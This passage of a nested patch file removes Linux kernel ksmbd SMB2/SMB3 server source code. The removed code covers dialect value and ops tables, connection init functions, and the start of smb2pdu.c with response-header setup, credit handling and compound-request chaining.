+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_values smb302_server_values = {
+-	.version_string = SMB302_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB3_DEFAULT_IOSIZE,
+-	.max_write_size = SMB3_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_values smb311_server_values = {
+-	.version_string = SMB311_VERSION_STRING,
+-	.protocol_id = SMB311_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB3_DEFAULT_IOSIZE,
+-	.max_write_size = SMB3_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_ops smb2_0_server_ops = {
+-	.get_cmd_val		=	get_smb2_cmd_val,
+-	.init_rsp_hdr		=	init_smb2_rsp_hdr,
+-	.set_rsp_status		=	set_smb2_rsp_status,
+-	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
+-	.set_rsp_credits	=	smb2_set_rsp_credits,
+-	.check_user_session	=	smb2_check_user_session,
+-	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
+-	.is_sign_req		=	smb2_is_sign_req,
+-	.check_sign_req		=	smb2_check_sign_req,
+-	.set_sign_rsp		=	smb2_set_sign_rsp
+-};
+-
+-static struct smb_version_ops smb3_0_server_ops = {
+-	.get_cmd_val		=	get_smb2_cmd_val,
+-	.init_rsp_hdr		=	init_smb2_rsp_hdr,
+-	.set_rsp_status		=	set_smb2_rsp_status,
+-	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
+-	.set_rsp_credits	=	smb2_set_rsp_credits,
+-	.check_user_session	=	smb2_check_user_session,
+-	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
+-	.is_sign_req		=	smb2_is_sign_req,
+-	.check_sign_req		=	smb3_check_sign_req,
+-	.set_sign_rsp		=	smb3_set_sign_rsp,
+-	.generate_signingkey	=	ksmbd_gen_smb30_signingkey,
+-	.generate_encryptionkey	=	ksmbd_gen_smb30_encryptionkey,
+-	.is_transform_hdr	=	smb3_is_transform_hdr,
+-	.decrypt_req		=	smb3_decrypt_req,
+-	.encrypt_resp		=	smb3_encrypt_resp
+-};
+-
+-static struct smb_version_ops smb3_11_server_ops = {
+-	.get_cmd_val		=	get_smb2_cmd_val,
+-	.init_rsp_hdr		=	init_smb2_rsp_hdr,
+-	.set_rsp_status		=	set_smb2_rsp_status,
+-	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
+-	.set_rsp_credits	=	smb2_set_rsp_credits,
+-	.check_user_session	=	smb2_check_user_session,
+-	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
+-	.is_sign_req		=	smb2_is_sign_req,
+-	.check_sign_req		=	smb3_check_sign_req,
+-	.set_sign_rsp		=	smb3_set_sign_rsp,
+-	.generate_signingkey	=	ksmbd_gen_smb311_signingkey,
+-	.generate_encryptionkey	=	ksmbd_gen_smb311_encryptionkey,
+-	.is_transform_hdr	=	smb3_is_transform_hdr,
+-	.decrypt_req		=	smb3_decrypt_req,
+-	.encrypt_resp		=	smb3_encrypt_resp
+-};
+-
+-static struct smb_version_cmds smb2_0_server_cmds[NUMBER_OF_SMB2_COMMANDS] = {
+-	[SMB2_NEGOTIATE_HE]	=	{ .proc = smb2_negotiate_request, },
+-	[SMB2_SESSION_SETUP_HE] =	{ .proc = smb2_sess_setup, },
+-	[SMB2_TREE_CONNECT_HE]  =	{ .proc = smb2_tree_connect,},
+-	[SMB2_TREE_DISCONNECT_HE]  =	{ .proc = smb2_tree_disconnect,},
+-	[SMB2_LOGOFF_HE]	=	{ .proc = smb2_session_logoff,},
+-	[SMB2_CREATE_HE]	=	{ .proc = smb2_open},
+-	[SMB2_QUERY_INFO_HE]	=	{ .proc = smb2_query_info},
+-	[SMB2_QUERY_DIRECTORY_HE] =	{ .proc = smb2_query_dir},
+-	[SMB2_CLOSE_HE]		=	{ .proc = smb2_close},
+-	[SMB2_ECHO_HE]		=	{ .proc = smb2_echo},
+-	[SMB2_SET_INFO_HE]      =       { .proc = smb2_set_info},
+-	[SMB2_READ_HE]		=	{ .proc = smb2_read},
+-	[SMB2_WRITE_HE]		=	{ .proc = smb2_write},
+-	[SMB2_FLUSH_HE]		=	{ .proc = smb2_flush},
+-	[SMB2_CANCEL_HE]	=	{ .proc = smb2_cancel},
+-	[SMB2_LOCK_HE]		=	{ .proc = smb2_lock},
+-	[SMB2_IOCTL_HE]		=	{ .proc = smb2_ioctl},
+-	[SMB2_OPLOCK_BREAK_HE]	=	{ .proc = smb2_oplock_break},
+-	[SMB2_CHANGE_NOTIFY_HE]	=	{ .proc = smb2_notify},
+-};
+-
+-/**
+- * init_smb2_1_server() - initialize an smb server connection with the smb2.1
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-void init_smb2_1_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb21_server_values;
+-	conn->ops = &smb2_0_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_HMAC_SHA256_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-}
+-
+-/**
+- * init_smb3_0_server() - initialize an smb server connection with the smb3.0
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-void init_smb3_0_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb30_server_values;
+-	conn->ops = &smb3_0_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+-	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+-}
+-
+-/**
+- * init_smb3_02_server() - initialize an smb server connection with the smb3.02
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-void init_smb3_02_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb302_server_values;
+-	conn->ops = &smb3_0_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
+-	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+-}
+-
+-/**
+- * init_smb3_11_server() - initialize an smb server connection with the smb3.11
+- *			command dispatcher
+- * @conn:	connection instance
+- */
+-int init_smb3_11_server(struct ksmbd_conn *conn)
+-{
+-	conn->vals = &smb311_server_values;
+-	conn->ops = &smb3_11_server_ops;
+-	conn->cmds = smb2_0_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
+-	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
+-
+-	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
+-		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
+-
+-	INIT_LIST_HEAD(&conn->preauth_sess_table);
+-	return 0;
+-}
+-
+-void init_smb2_max_read_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
+-	smb21_server_values.max_read_size = sz;
+-	smb30_server_values.max_read_size = sz;
+-	smb302_server_values.max_read_size = sz;
+-	smb311_server_values.max_read_size = sz;
+-}
+-
+-void init_smb2_max_write_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
+-	smb21_server_values.max_write_size = sz;
+-	smb30_server_values.max_write_size = sz;
+-	smb302_server_values.max_write_size = sz;
+-	smb311_server_values.max_write_size = sz;
+-}
+-
+-void init_smb2_max_trans_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMB3_MIN_IOSIZE, SMB3_MAX_IOSIZE);
+-	smb21_server_values.max_trans_size = sz;
+-	smb30_server_values.max_trans_size = sz;
+-	smb302_server_values.max_trans_size = sz;
+-	smb311_server_values.max_trans_size = sz;
+-}
+-
+-void init_smb2_max_credits(unsigned int sz)
+-{
+-	smb21_server_values.max_credits = sz;
+-	smb30_server_values.max_credits = sz;
+-	smb302_server_values.max_credits = sz;
+-	smb311_server_values.max_credits = sz;
+-}
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+deleted file mode 100644
+index 56f661e5ef628..0000000000000
+--- a/fs/ksmbd/smb2pdu.c
++++ /dev/null
+@@ -1,8693 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/inetdevice.h>
+-#include <net/addrconf.h>
+-#include <linux/syscalls.h>
+-#include <linux/namei.h>
+-#include <linux/statfs.h>
+-#include <linux/ethtool.h>
+-#include <linux/falloc.h>
+-#include <linux/mount.h>
+-
+-#include "glob.h"
+-#include "smbfsctl.h"
+-#include "oplock.h"
+-#include "smbacl.h"
+-
+-#include "auth.h"
+-#include "asn1.h"
+-#include "connection.h"
+-#include "transport_ipc.h"
+-#include "transport_rdma.h"
+-#include "vfs.h"
+-#include "vfs_cache.h"
+-#include "misc.h"
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "ksmbd_work.h"
+-#include "mgmt/user_config.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/ksmbd_ida.h"
+-#include "ndr.h"
+-
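+-/*
+- * For compound (chained) requests, pick the request/response PDUs at the
+- * current chain offset; otherwise use the first PDU in each buffer.
+- */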
+-static void __wbuf(struct ksmbd_work *work, void **req, void **rsp)
+-{
+-	if (work->next_smb2_rcv_hdr_off) {
+-		*req = ksmbd_req_buf_next(work);
+-		*rsp = ksmbd_resp_buf_next(work);
+-	} else {
+-		*req = smb2_get_msg(work->request_buf);
+-		*rsp = smb2_get_msg(work->response_buf);
+-	}
+-}
+-
+-#define WORK_BUFFERS(w, rq, rs)	__wbuf((w), (void **)&(rq), (void **)&(rs))
+-
+-/**
+- * check_session_id() - check for valid session id in smb header
+- * @conn:	connection instance
+- * @id:		session id from smb header
+- *
+- * Return:      true if the session id is valid, otherwise false
+- */
+-static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	if (id == 0 || id == -1)
+-		return false;
+-
+-	sess = ksmbd_session_lookup_all(conn, id);
+-	if (sess)
+-		return true;
+-	pr_err("Invalid user session id: %llu\n", id);
+-	return false;
+-}
+-
+-struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
+-{
+-	return xa_load(&sess->ksmbd_chann_list, (long)conn);
+-}
+-
+-/**
+- * smb2_get_ksmbd_tcon() - get tree connection information using a tree id.
+- * @work:	smb work
+- *
+- * Return:	1 if a matching tree connection is found, 0 if the command
+- *		does not require one (skippable), otherwise error
+- */
+-int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
+-	unsigned int cmd = le16_to_cpu(req_hdr->Command);
+-	int tree_id;
+-
+-	work->tcon = NULL;
+-	if (cmd == SMB2_TREE_CONNECT_HE ||
+-	    cmd ==  SMB2_CANCEL_HE ||
+-	    cmd ==  SMB2_LOGOFF_HE) {
+-		ksmbd_debug(SMB, "skip to check tree connect request\n");
+-		return 0;
+-	}
+-
+-	if (xa_empty(&work->sess->tree_conns)) {
+-		ksmbd_debug(SMB, "NO tree connected\n");
+-		return -ENOENT;
+-	}
+-
+-	tree_id = le32_to_cpu(req_hdr->Id.SyncId.TreeId);
+-	work->tcon = ksmbd_tree_conn_lookup(work->sess, tree_id);
+-	if (!work->tcon) {
+-		pr_err("Invalid tid %d\n", tree_id);
+-		return -EINVAL;
+-	}
+-
+-	return 1;
+-}
+-
+-/**
+- * smb2_set_err_rsp() - set error response code on smb response
+- * @work:	smb work containing response buffer
+- */
+-void smb2_set_err_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_err_rsp *err_rsp;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		err_rsp = ksmbd_resp_buf_next(work);
+-	else
+-		err_rsp = smb2_get_msg(work->response_buf);
+-
+-	if (err_rsp->hdr.Status != STATUS_STOPPED_ON_SYMLINK) {
+-		err_rsp->StructureSize = SMB2_ERROR_STRUCTURE_SIZE2_LE;
+-		err_rsp->ErrorContextCount = 0;
+-		err_rsp->Reserved = 0;
+-		err_rsp->ByteCount = 0;
+-		err_rsp->ErrorData[0] = 0;
+-		inc_rfc1001_len(work->response_buf, SMB2_ERROR_STRUCTURE_SIZE2);
+-	}
+-}
+-
+-/**
+- * is_smb2_neg_cmd() - is it smb2 negotiation command
+- * @work:	smb work containing smb header
+- *
+- * Return:      true if smb2 negotiation command, otherwise false
+- */
+-bool is_smb2_neg_cmd(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-
+-	/* is it SMB2 header ? */
+-	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
+-		return false;
+-
+-	/* make sure it is a request, not a response message */
+-	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-		return false;
+-
+-	if (hdr->Command != SMB2_NEGOTIATE)
+-		return false;
+-
+-	return true;
+-}
+-
+-/**
+- * is_smb2_rsp() - is it smb2 response
+- * @work:	smb work containing smb response buffer
+- *
+- * Return:      true if smb2 response, otherwise false
+- */
+-bool is_smb2_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->response_buf);
+-
+-	/* is it SMB2 header ? */
+-	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
+-		return false;
+-
+-	/* make sure it is a response, not a request message */
+-	if (!(hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR))
+-		return false;
+-
+-	return true;
+-}
+-
+-/**
+- * get_smb2_cmd_val() - get smb command code from smb header
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      smb2 request command value
+- */
+-u16 get_smb2_cmd_val(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *rcv_hdr;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		rcv_hdr = ksmbd_req_buf_next(work);
+-	else
+-		rcv_hdr = smb2_get_msg(work->request_buf);
+-	return le16_to_cpu(rcv_hdr->Command);
+-}
+-
+-/**
+- * set_smb2_rsp_status() - set error response code on smb2 header
+- * @work:	smb work containing response buffer
+- * @err:	error response code
+- */
+-void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		rsp_hdr = ksmbd_resp_buf_next(work);
+-	else
+-		rsp_hdr = smb2_get_msg(work->response_buf);
+-	rsp_hdr->Status = err;
+-	smb2_set_err_rsp(work);
+-}
+-
+-/**
+- * init_smb2_neg_rsp() - initialize smb2 response for negotiate command
+- * @work:	smb work containing smb request buffer
+- *
+- * The smb2 negotiate response is sent in reply to the smb1 negotiate command
+- * for dialect auto-negotiation.
+- */
+-int init_smb2_neg_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *rsp_hdr;
+-	struct smb2_negotiate_rsp *rsp;
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->CreditRequest = cpu_to_le16(2);
+-	rsp_hdr->Command = SMB2_NEGOTIATE;
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = 0;
+-	rsp_hdr->Id.SyncId.ProcessId = 0;
+-	rsp_hdr->Id.SyncId.TreeId = 0;
+-	rsp_hdr->SessionId = 0;
+-	memset(rsp_hdr->Signature, 0, 16);
+-
+-	rsp = smb2_get_msg(work->response_buf);
+-
+-	WARN_ON(ksmbd_conn_good(conn));
+-
+-	rsp->StructureSize = cpu_to_le16(65);
+-	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+-	rsp->DialectRevision = cpu_to_le16(conn->dialect);
+-	/* Not setting conn guid rsp->ServerGUID, as it is
+-	 * not used by the client for identifying the connection
+-	 */
+-	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
+-	/* Default max message size up to SMB2.0 is 64K */
+-	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
+-	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
+-	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
+-
+-	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
+-	rsp->ServerStartTime = 0;
+-
+-	rsp->SecurityBufferOffset = cpu_to_le16(128);
+-	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+-	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+-		le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			AUTH_GSS_LENGTH);
+-	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+-	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
+-		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+-	conn->use_spnego = true;
+-
+-	ksmbd_conn_set_need_negotiate(conn);
+-	return 0;
+-}
+-
+-/**
+- * smb2_set_rsp_credits() - set number of credits in response buffer
+- * @work:	smb work containing smb response buffer
+- */
+-int smb2_set_rsp_credits(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
+-	struct smb2_hdr *hdr = ksmbd_resp_buf_next(work);
+-	struct ksmbd_conn *conn = work->conn;
+-	unsigned short credits_requested, aux_max;
+-	unsigned short credit_charge, credits_granted = 0;
+-
+-	if (work->send_no_response)
+-		return 0;
+-
+-	hdr->CreditCharge = req_hdr->CreditCharge;
+-
+-	if (conn->total_credits > conn->vals->max_credits) {
+-		hdr->CreditRequest = 0;
+-		pr_err("Total credits overflow: %d\n", conn->total_credits);
+-		return -EINVAL;
+-	}
+-
+-	credit_charge = max_t(unsigned short,
+-			      le16_to_cpu(req_hdr->CreditCharge), 1);
+-	if (credit_charge > conn->total_credits) {
+-		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
+-			    credit_charge, conn->total_credits);
+-		return -EINVAL;
+-	}
+-
+-	conn->total_credits -= credit_charge;
+-	conn->outstanding_credits -= credit_charge;
+-	credits_requested = max_t(unsigned short,
+-				  le16_to_cpu(req_hdr->CreditRequest), 1);
+-
+-	/* according to the smb2.credits smbtorture test, Windows Server
+-	 * 2016 or later grants up to 8192 credits at once.
+-	 *
+-	 * TODO: Need to adjust the CreditRequest value according to
+-	 * the current cpu load
+-	 */
+-	if (hdr->Command == SMB2_NEGOTIATE)
+-		aux_max = 1;
+-	else
+-		aux_max = conn->vals->max_credits - conn->total_credits;
+-	credits_granted = min_t(unsigned short, credits_requested, aux_max);
+-
+-	conn->total_credits += credits_granted;
+-	work->credits_granted += credits_granted;
+-
+-	if (!req_hdr->NextCommand) {
+-		/* Update CreditRequest in last request */
+-		hdr->CreditRequest = cpu_to_le16(work->credits_granted);
+-	}
+-	ksmbd_debug(SMB,
+-		    "credits: requested[%d] granted[%d] total_granted[%d]\n",
+-		    credits_requested, credits_granted,
+-		    conn->total_credits);
+-	return 0;
+-}
+-
+-/**
+- * init_chained_smb2_rsp() - initialize smb2 chained response
+- * @work:	smb work containing smb response buffer
+- */
+-static void init_chained_smb2_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *req = ksmbd_req_buf_next(work);
+-	struct smb2_hdr *rsp = ksmbd_resp_buf_next(work);
+-	struct smb2_hdr *rsp_hdr;
+-	struct smb2_hdr *rcv_hdr;
+-	int next_hdr_offset = 0;
+-	int len, new_len;
+-
+-	/* The length of this response = updated RFC length - offset of the
+-	 * previous command in the compound response
+-	 */
+-
+-	/* Store the current local FID, which may be needed by a subsequent
+-	 * command in the compound request
+-	 */
+-	if (req->Command == SMB2_CREATE && rsp->Status == STATUS_SUCCESS) {
+-		work->compound_fid = ((struct smb2_create_rsp *)rsp)->VolatileFileId;
+-		work->compound_pfid = ((struct smb2_create_rsp *)rsp)->PersistentFileId;
+-		work->compound_sid = le64_to_cpu(rsp->SessionId);
+-	}
+-
+-	len = get_rfc1002_len(work->response_buf) - work->next_smb2_rsp_hdr_off;
+-	next_hdr_offset = le32_to_cpu(req->NextCommand);
+-
+-	new_len = ALIGN(len, 8);
+-	inc_rfc1001_len(work->response_buf,
+-			sizeof(struct smb2_hdr) + new_len - len);
+-	rsp->NextCommand = cpu_to_le32(new_len);
+-
+-	work->next_smb2_rcv_hdr_off += next_hdr_offset;
+-	work->next_smb2_rsp_hdr_off += new_len;
+-	ksmbd_debug(SMB,
+-		    "Compound req new_len = %d rcv off = %d rsp off = %d\n",
+-		    new_len, work->next_smb2_rcv_hdr_off,
+-		    work->next_smb2_rsp_hdr_off);
+-
+-	rsp_hdr = ksmbd_resp_buf_next(work);
+-	rcv_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!(rcv_hdr->Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
+-		ksmbd_debug(SMB, "related flag should be set\n");
+-		work->compound_fid = KSMBD_NO_FID;
+-		work->compound_pfid = KSMBD_NO_FID;
+-	}
+-	memset((char *)rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->Command = rcv_hdr->Command;
+-
+-	/*
+-	 * The message is a response. We don't grant the oplock yet.
+-	 */
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR |
+-				SMB2_FLAGS_RELATED_OPERATIONS);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = rcv_hdr->MessageId;
+-	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
+-	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
+-	rsp_hdr->SessionId = rcv_hdr->SessionId;
+-	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
+-}
+-
+-/**
+- * is_chained_smb2_message() - check for chained command
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      true if chained request, otherwise false
+- */
+-bool is_chained_smb2_message(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-	unsigned int len, next_cmd;
+-
+-	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
+-		return false;
+-
+-	hdr = ksmbd_req_buf_next(work);
+-	next_cmd = le32_to_cpu(hdr->NextCommand);
+-	if (next_cmd > 0) {
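+-		/* the chained PDU and its header must fit in the received buffer */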
+-		if ((u64)work->next_smb2_rcv_hdr_off + next_cmd +
+-			__SMB2_HEADER_STRUCTURE_SIZE >
+-		    get_rfc1002_len(work->request_buf)) {
+-			pr_err("next command(%u) offset exceeds smb msg size\n",
+-			       next_cmd);
+-			return false;
+-		}
+-
+-		if ((u64)get_rfc1002_len(work->response_buf) + MAX_CIFS_SMALL_BUFFER_SIZE >
+-		    work->response_sz) {
+-			pr_err("next response offset exceeds response buffer size\n");
+-			return false;
+-		}
+-
+-		ksmbd_debug(SMB, "got SMB2 chained command\n");
+-		init_chained_smb2_rsp(work);
+-		return true;
+-	} else if (work->next_smb2_rcv_hdr_off) {
+-		/*
+-		 * This is the last request in the chained command;
+-		 * align the response to an 8-byte boundary.
+-		 */
+-		len = ALIGN(get_rfc1002_len(work->response_buf), 8);
+-		len = len - get_rfc1002_len(work->response_buf);
+-		if (len) {
+-			ksmbd_debug(SMB, "padding len %u\n", len);
+-			inc_rfc1001_len(work->response_buf, len);
+-			if (work->aux_payload_sz)
+-				work->aux_payload_sz += len;
+-		}
+-	}
+-	return false;
+-}
+-
+-/**
+- * init_smb2_rsp_hdr() - initialize smb2 response
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0
+- */
+-int init_smb2_rsp_hdr(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *rsp_hdr = smb2_get_msg(work->response_buf);
+-	struct smb2_hdr *rcv_hdr = smb2_get_msg(work->request_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-	rsp_hdr->ProtocolId = rcv_hdr->ProtocolId;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->Command = rcv_hdr->Command;
+-
+-	/*
+-	 * The message is a response. We don't grant the oplock yet.
+-	 */
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = rcv_hdr->MessageId;
